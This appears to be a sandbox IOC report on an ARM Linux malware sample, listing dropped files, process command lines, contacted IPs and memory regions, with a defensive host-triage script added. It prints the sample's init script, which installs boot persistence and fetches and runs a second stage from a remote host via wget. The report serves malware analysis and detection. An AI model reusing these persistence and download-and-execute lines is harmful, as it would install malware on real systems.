IOC Report
arm5.nn.elf


Files

File Path | Type | Category | Malicious
arm5.nn.elf | ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped | initial sample | malicious
/etc/init.d/arm5.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/mybinary | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped | -
/etc/inittab | ASCII text | dropped | -
/etc/motd | ASCII text | dropped | -
/etc/systemd/system/custom.service | ASCII text | dropped | -
/memfd:snapd-env-generator (deleted) | ASCII text | dropped | -
/tmp/qemu-open.ItNjza (deleted) | ASCII text | dropped | -
/tmp/qemu-open.XYqTN7 (deleted) | ASCII text, with no line terminators | dropped | -
(2 further files are not included in this export.)

Processes

Path | Cmdline
/tmp/arm5.nn.elf | /tmp/arm5.nn.elf
/tmp/arm5.nn.elf | -
/tmp/arm5.nn.elf | -
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh | -
/usr/bin/systemctl | systemctl enable custom.service
/tmp/arm5.nn.elf | -
/bin/sh | sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
/bin/sh | -
/usr/bin/chmod | chmod +x /etc/init.d/mybinary
/tmp/arm5.nn.elf | -
/bin/sh | sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
/bin/sh | -
/usr/bin/ln | ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
/tmp/arm5.nn.elf | -
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm5.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm5.nn.elf'\n /tmp/arm5.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm5.nn.elf'\n killall arm5.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm5.nn.elf"
/tmp/arm5.nn.elf | -
/bin/sh | sh -c "chmod +x /etc/init.d/arm5.nn.elf >/dev/null 2>&1"
/bin/sh | -
/usr/bin/chmod | chmod +x /etc/init.d/arm5.nn.elf
/tmp/arm5.nn.elf | -
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh | -
/usr/bin/mkdir | mkdir -p /etc/rc.d
/tmp/arm5.nn.elf | -
/bin/sh | sh -c "ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf >/dev/null 2>&1"
/bin/sh | -
/usr/bin/ln | ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf
/tmp/arm5.nn.elf | -
/usr/libexec/gnome-session-binary | -
/bin/sh | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping | /usr/libexec/gsd-housekeeping
/usr/lib/systemd/systemd | -
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator
(24 further processes are not included in this export. The Malicious column is empty for every row shown.)

The sample installs persistence four ways in the sequence above: it enables a systemd unit (custom.service), marks /etc/init.d/mybinary executable and links it as /etc/rcS.d/S99mybinary, writes its own SysV init script to /etc/init.d/arm5.nn.elf, and links that script as /etc/rc.d/S99arm5.nn.elf after creating /etc/rc.d. The init script, as it appears once the echo escaping in the command line is removed, restarts the sample from /tmp and fetches a second-stage script from the reported URL:

    #!/bin/sh
    # /etc/init.d/arm5.nn.elf

    case "$1" in
     start)
     echo 'Starting arm5.nn.elf'
     /tmp/arm5.nn.elf &
     wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh
     chmod +x /tmp/lol.sh
     /tmp/lol.sh &
     ;;
     stop)
     echo 'Stopping arm5.nn.elf'
     killall arm5.nn.elf
     ;;
     restart)
     $0 stop
     $0 start
     ;;
     *)
     echo "Usage: $0 {start|stop|restart}"
     exit 1
     ;;
    esac
    exit 0

Note that in the command line as displayed, $0 and $1 sit inside the double-quoted echo argument, so the sh -c that writes the file would expand them before the script is written; the file on disk may therefore not match the rendering above exactly. The gnome-session-binary, gsd-housekeeping, systemd and snapd-env-generator rows are background services of the sandbox host rather than children of the sample.
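The persistence installation above gives a concrete list of artifacts to look for on a suspect host or a mounted disk image. The following host-triage script is an added example written for this page; it is not part of the sandbox report and not the sample's own code. It checks for the exact paths the sample created (dangling symlinks included) and then greps every boot-time file the report lists as dropped, plus all init scripts and unit files, for a binary launched from /tmp or a reference to the reported download host. The root argument is an assumption so the check can be pointed at an image mounted under another directory; it defaults to "/".

```shell
#!/bin/sh
# Added host-triage example, not part of the sandbox report. Lists the
# persistence artifacts from the Files and Processes tables: init scripts and
# S99 symlinks named after the sample, the custom.service unit, and any
# boot-time file that runs something out of /tmp or fetches from the
# reported URL. The root argument (assumed, for mounted images or a test
# tree) defaults to "/".

find_persistence() {
    root="${1:-/}"
    root="${root%/}"   # strip a trailing slash so "$root/etc" is well formed

    # 1. Exact paths the sample created. -L catches dangling symlinks
    #    (e.g. S99mybinary pointing at a script that was cleaned up), which
    #    -e alone would miss.
    for f in "$root/etc/init.d/arm5.nn.elf" \
             "$root/etc/init.d/mybinary" \
             "$root/etc/rcS.d/S99mybinary" \
             "$root/etc/rc.d/S99arm5.nn.elf" \
             "$root/etc/systemd/system/custom.service" \
             "$root/tmp/lol.sh"; do
        if [ -e "$f" ] || [ -L "$f" ]; then
            echo "HIT path    $f"
        fi
    done

    # 2. Content check on the boot-time files the report lists as dropped,
    #    plus every init script and unit file: launching from /tmp or
    #    referencing the download host is suspicious whatever the file name.
    for f in "$root"/etc/init.d/* \
             "$root"/etc/systemd/system/*.service \
             "$root/etc/rc.local" "$root/etc/profile" "$root/etc/inittab" \
             "$root/etc/motd" "$root/boot/bootcmd"; do
        [ -f "$f" ] || continue
        if grep -Eq '/tmp/[^[:space:]]+|pen\.gorillafirewall\.su' "$f" 2>/dev/null; then
            echo "HIT content $f"
        fi
    done
}

# Usage: sh triage.sh [root]    e.g.  sh triage.sh /mnt/evidence
if [ "$#" -gt 0 ]; then
    find_persistence "$1"
fi
```

Run it against a mounted image rather than a live host where possible; on a live host the sample can re-create the init script from memory, so a clean file listing proves little until /tmp/arm5.nn.elf has been killed.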

URLs

Name | IP | Malicious
http://pen.gorillafirewall.su/ | unknown | -

Domains

Name | IP | Malicious
daisy.ubuntu.com | 162.213.35.25 | -
(daisy.ubuntu.com is Ubuntu's crash-report endpoint, contacted by the sandbox host itself; it is not flagged.)

IPs

IP | Domain | Country | Malicious
154.216.17.220 | unknown | Seychelles | malicious
91.92.246.113 | unknown | Bulgaria | malicious
93.123.85.166 | unknown | Bulgaria | malicious
45.202.35.64 | unknown | Seychelles | -

Memdumps

Base Address | Protect | Malicious
7f337c02b000 | page execute read | malicious
7f3483518000 | page read and write | -
7f34836fa000 | page read and write | -
7f3483a6d000 | page read and write | -
5616edf7b000 | page read and write | -
7f337c033000 | page read and write | -
7f347bfff000 | page read and write | -
7f3483a04000 | page read and write | -
7f34838db000 | page read and write | -
7f337c037000 | page read and write | -
7f3482dbc000 | page read and write | -
7f347c021000 | page read and write | -
7f348311e000 | page read and write | -
7f3482d2a000 | page read and write | -
5616f0235000 | page read and write | -
7f3483389000 | page read and write | -
5616edd21000 | page execute read | -
7f3482522000 | page read and write | -
7f3483a28000 | page read and write | -
7ffd48b7f000 | page execute read | -
7ffd48aa4000 | page read and write | -
5616eff90000 | page read and write | -
5616edf72000 | page read and write | -
7f34833ac000 | page read and write | -
5616eff79000 | page execute and read and write | -
(15 further memdumps are not included in this export. The region-type column is empty in this export.)

The base addresses are 48-bit x86-64 user-space addresses (7f…, 5616…, 7ffd…), not addresses inside the 32-bit ARM sample: the dumps were taken from the emulator process that ran the ARM binary, so offsets from them should not be compared directly with the ELF's own section layout.